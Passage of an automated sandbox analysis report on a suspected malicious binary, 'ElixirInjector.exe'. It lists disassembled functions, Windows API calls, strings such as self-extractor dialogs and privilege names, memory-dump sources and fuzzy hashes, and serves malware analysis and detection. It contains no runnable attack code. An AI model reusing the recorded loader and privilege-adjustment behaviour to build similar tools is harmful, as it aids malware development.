Instruction Fuzzy Hash: 45F0DA7581122E9BDB866F14FC024553FB1F725B747010566F51C562B2CF398993FB82

Function 00F215FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00F217BC
_swprintf.LIBCMT ref: 00F2186B

Strings

%ls, xrefs: 00F21641, 00F21657
%s: %s, xrefs: 00F217CB

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 0ed955200289b2e5e836c1128047833100a92129854677824051e16f2ba365c8
Instruction ID: 0911b0808614fb36a92bb4b75f129a28a6799be7e63f6c54c2e8e2412b64ccd9
Opcode Fuzzy Hash: 0ed955200289b2e5e836c1128047833100a92129854677824051e16f2ba365c8
Instruction Fuzzy Hash: 07513A33288320F6F7311BA0BD86F797A65BB34B04F244506FB86B40E1C9A6A551B71F

Function 00F37F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ElixirInjector.exe,00000104), ref: 00F37FAE
_free.LIBCMT ref: 00F38079
_free.LIBCMT ref: 00F38083

Strings

C:\Users\user\Desktop\ElixirInjector.exe, xrefs: 00F37FA5, 00F37FAC, 00F37FDB, 00F38013

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\ElixirInjector.exe
API String ID: 2506810119-2228703999
Opcode ID: 043ebf4c6a89154d07fbcefa3a8be01b4c650b3eb8ba51aec53aa022e3bab265
Instruction ID: fd66ccd75064ef8ac53c7f3ffa8ce71357f1ca0c06c18263a4a26d455f20eb1f
Opcode Fuzzy Hash: 043ebf4c6a89154d07fbcefa3a8be01b4c650b3eb8ba51aec53aa022e3bab265
Instruction Fuzzy Hash: A931A2B1A04318AFCB25EFA8DC8099EBBB8EB85370F104066F50497211DAB48A85EB51

Function 00F331D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F331FB
_abort.LIBCMT ref: 00F33306

Strings

RCC, xrefs: 00F33215
MOC, xrefs: 00F3320D

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 734e6f8351e26a4c07e4a2bb2c790d631ccaae5185e4c27a2ab7aa07984cd503
Instruction ID: a893764a12a0ea1db928009262679c3157b8a501bb1c9a75ee942a0779242c4e
Opcode Fuzzy Hash: 734e6f8351e26a4c07e4a2bb2c790d631ccaae5185e4c27a2ab7aa07984cd503
Instruction Fuzzy Hash: C9414771D00209AFCF15DF98CD81AEEBBB5BF48324F198059F905A7221D739EA50EB50

Function 00F17401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F17406

Part of subcall function 00F13BBA: __EH_prolog.LIBCMT ref: 00F13BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00F174CD

Part of subcall function 00F17A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F17AAB
Part of subcall function 00F17A9C: GetLastError.KERNEL32 ref: 00F17AF1
Part of subcall function 00F17A9C: CloseHandle.KERNEL32(?), ref: 00F17B00

Strings

SeSecurityPrivilege, xrefs: 00F1744B
SeRestorePrivilege, xrefs: 00F17460

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: d9c771540b7e60180dd1b7ceca0c34cad21e232052f81420beeaf96e89f71f6d
Instruction ID: eb1ded4bf279f5535e450262751fe2a60578d23e6182bf7c0e3418bcd660532c
Opcode Fuzzy Hash: d9c771540b7e60180dd1b7ceca0c34cad21e232052f81420beeaf96e89f71f6d
Instruction Fuzzy Hash: F531E171D04358AADF10EBA4DC45BEE7FB9BF09314F044015F808A7292CB789AC4E761

Function 00F2AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00F11316: GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
Part of subcall function 00F11316: SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

EndDialog.USER32(?,00000001), ref: 00F2AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F2ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00F2ADC2

Strings

ASKNEXTVOL, xrefs: 00F2AD28

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 44acf351ab96eae84ecf6d7e2378724305ea52290dab81b0fd61fdf9b52bbaa2
Instruction ID: 92a76566ec29a58c3c33f3c01006007856625367e6f3cc41044619c5cb2f72b5
Opcode Fuzzy Hash: 44acf351ab96eae84ecf6d7e2378724305ea52290dab81b0fd61fdf9b52bbaa2
Instruction Fuzzy Hash: 7D11E932680224BFD7229FACED05FAA7769FF4A702F800404F245DB4A0C7619945B723

Function 00F1D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00F1D954
_strncpy.LIBCMT ref: 00F1D99A

Part of subcall function 00F21DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00F51030,?,00F1D928,00000000,?,00000050,00F51030), ref: 00F21DC4

Strings

$%s, xrefs: 00F1D949
@%s, xrefs: 00F1D93E

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: d536f87a28c0342bd77cf7f1db6e802b3a98e93c9228326802642c0090aedfd8
Instruction ID: 85d74a71aa818e2604a991c7a22fca7bc24a42005cb97f3d180ba9207ab94aa0
Opcode Fuzzy Hash: d536f87a28c0342bd77cf7f1db6e802b3a98e93c9228326802642c0090aedfd8
Instruction Fuzzy Hash: 3921A23284024CAEDB21EEA4CD01FDE7BB8AF05710F444122FD10961A2E775D698EB52

Function 00F20E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F1AC5A,00000008,?,00000000,?,00F1D22D,?,00000000), ref: 00F20E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F1AC5A,00000008,?,00000000,?,00F1D22D,?,00000000), ref: 00F20E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F1AC5A,00000008,?,00000000,?,00F1D22D,?,00000000), ref: 00F20E9F

Strings

Thread pool initialization failed., xrefs: 00F20EB7

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: e707cd9a086a2de2e2c6e22f1bdedf712fc85ce7b0eab6910c779dc874cbb753
Instruction ID: 45c23fd67370e7e00c0608d39822d1113abeaddbcbcea5b53bf16f0e9ffb0e50
Opcode Fuzzy Hash: e707cd9a086a2de2e2c6e22f1bdedf712fc85ce7b0eab6910c779dc874cbb753
Instruction Fuzzy Hash: 681194B2A007189FC3215F6AAC84AA7FBECEB65755F11482EF5D6C3201DA715980AB50

Function 00F2B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00F11316: GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
Part of subcall function 00F11316: SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

EndDialog.USER32(?,00000001), ref: 00F2B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F2B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00F2B304

Strings

GETPASSWORD1, xrefs: 00F2B289

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 2157b10a88f50ce236df4f8713fd172ff9d092889d41a46160719206823f74a9
Instruction ID: f54f595b79d5167baaa6e981c9922dd8d05b380db50d5be42b0990ed04578bab
Opcode Fuzzy Hash: 2157b10a88f50ce236df4f8713fd172ff9d092889d41a46160719206823f74a9
Instruction Fuzzy Hash: 7811C432D00229B6DB229E64AC49FFF376CEF59710F000420FE45B20C0C7A59E85B7A2

Function 00F2DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00F2DD1C, 00F2DD50
RENAMEDLG, xrefs: 00F2DD31

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 576fb50eccb52df3a9b3554eb7794c151f31edc1056956123c37c9b867eddf76
Instruction ID: 15d1b2a5f2b487c99a73009f891947692acccb16a6c425cd6af60ebb81484ec2
Opcode Fuzzy Hash: 576fb50eccb52df3a9b3554eb7794c151f31edc1056956123c37c9b867eddf76
Instruction Fuzzy Hash: EF01B13AA0436DAFCB108F54FC44A6B3FA8F7083A5B000425FA0593271C6319850FBE1

Function 00F2DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F2DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F2DC30

Strings

sfxcmd, xrefs: 00F2DBEF
sfxpar, xrefs: 00F2DC2B

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: b83d16215a65cd7b4ac8305bc19e6e0fac0674521100619b97ab21b68a654277
Instruction ID: 9919b161eecd4994c387e258209f4facef4727950218bf86e88e64e8bc6b24dc
Opcode Fuzzy Hash: b83d16215a65cd7b4ac8305bc19e6e0fac0674521100619b97ab21b68a654277
Instruction Fuzzy Hash: FBF0EC7384423867DB203FD4AC06FFA3B5CAF15B91B040411BD8595152D6B4C940F6B1

Function 00F39A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F39AA9
__alldvrm.LIBCMT ref: 00F39CAA
__alldvrm.LIBCMT ref: 00F39CCC

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 64faab813b1fe88c44fa7318a07f5f9f804d782d124d24d11bc481db1e094bc8
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: FAA12572E082869FEB21CF28C8917AEBBE5EF55370F24416DE4859B381C2F88D41E750

Function 00F1A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00F17F69,?,?,?), ref: 00F1A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00F17F69,?), ref: 00F1A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00F17F69,?,?,?,?,?,?,?), ref: 00F1A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00F17F69,?,?,?,?,?,?,?,?,?,?), ref: 00F1A4C6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 80fc5eb84da72ee5c0a273b3f930a692ba36c1385d07bd8a8a30d08a5a894107
Instruction ID: 30183727d6b9fd3fb3177e26496e39fd9317755c62a06eba87b70fedefc5a52f
Opcode Fuzzy Hash: 80fc5eb84da72ee5c0a273b3f930a692ba36c1385d07bd8a8a30d08a5a894107
Instruction Fuzzy Hash: 0141E0316493819AD731DF24DC45FEEBBE4AB91310F04091DF5E093190D6A99A88FB53

Function 00F11100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F1112B
_wcslen.LIBCMT ref: 00F11153
_wcslen.LIBCMT ref: 00F11182
_wcslen.LIBCMT ref: 00F111A9

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 23c540b881771a114405b0dc722be0eddafda16ed1788b92f1b297e7f1bf4574
Instruction ID: 5ddce4928487e74fbf0460721c82569649f6996fdbfccbb2dc0695f0e22f1214
Opcode Fuzzy Hash: 23c540b881771a114405b0dc722be0eddafda16ed1788b92f1b297e7f1bf4574
Instruction Fuzzy Hash: AF41A471D006699BCB219F68CC499EE7BB8EF01320F000029FE45F7245DF34AE999BA5

Function 00F3C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00F347C6,00000000,00000000,00F357FB,?,00F357FB,?,00000001,00F347C6,2DE85006,00000001,00F357FB,00F357FB), ref: 00F3C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F3CA70
__freea.LIBCMT ref: 00F3CA79

Part of subcall function 00F38E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F34286,?,0000015D,?,?,?,?,00F35762,000000FF,00000000,?,?), ref: 00F38E38

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: d6c4aaa311805ee37b7172e1f820090209957ca9a27ab85ca0fa4b370d7a7572
Instruction ID: 108d0d959f04849a5e9654cda57a2fe7dae1cb857cd9b3e84ea2186792b8fc30
Opcode Fuzzy Hash: d6c4aaa311805ee37b7172e1f820090209957ca9a27ab85ca0fa4b370d7a7572
Instruction Fuzzy Hash: 3331B072A0021AABDF24DF65DC51EAE7BA5EB41320F044268FC14E6250E739DD50EBD0

Function 00F2A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F2A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F2A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F2A683
ReleaseDC.USER32(00000000,00000000), ref: 00F2A691

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f072aef57e1f9158756be9db7f713bb248c9e884b205d988f53a467a8f27450f
Instruction ID: e77c3a6b5c8432915ce8d51909fa22798819f0bbd2a6e13f6d47683589c8be0e
Opcode Fuzzy Hash: f072aef57e1f9158756be9db7f713bb248c9e884b205d988f53a467a8f27450f
Instruction Fuzzy Hash: B4E01231946736F7D7615B60BC0DB8B3E54AB06B97F010101FB09A61D0DF748681BBA2

Function 00F2A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00F2A699: GetDC.USER32(00000000), ref: 00F2A69D
Part of subcall function 00F2A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F2A6A8
Part of subcall function 00F2A699: ReleaseDC.USER32(00000000,00000000), ref: 00F2A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00F2A83C

Part of subcall function 00F2AAC9: GetDC.USER32(00000000), ref: 00F2AAD2
Part of subcall function 00F2AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00F2AB01
Part of subcall function 00F2AAC9: ReleaseDC.USER32(00000000,?), ref: 00F2AB99

Strings

(, xrefs: 00F2A9AA

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 86df3606b35f8d7cf376e05298d80b3b8f8bb0bf9cc2b66505e2890b40768ed7
Instruction ID: 1ea2dfce43f5bca5daca732a50a6f01e9d089f7cf652f2310f554f5b25287003
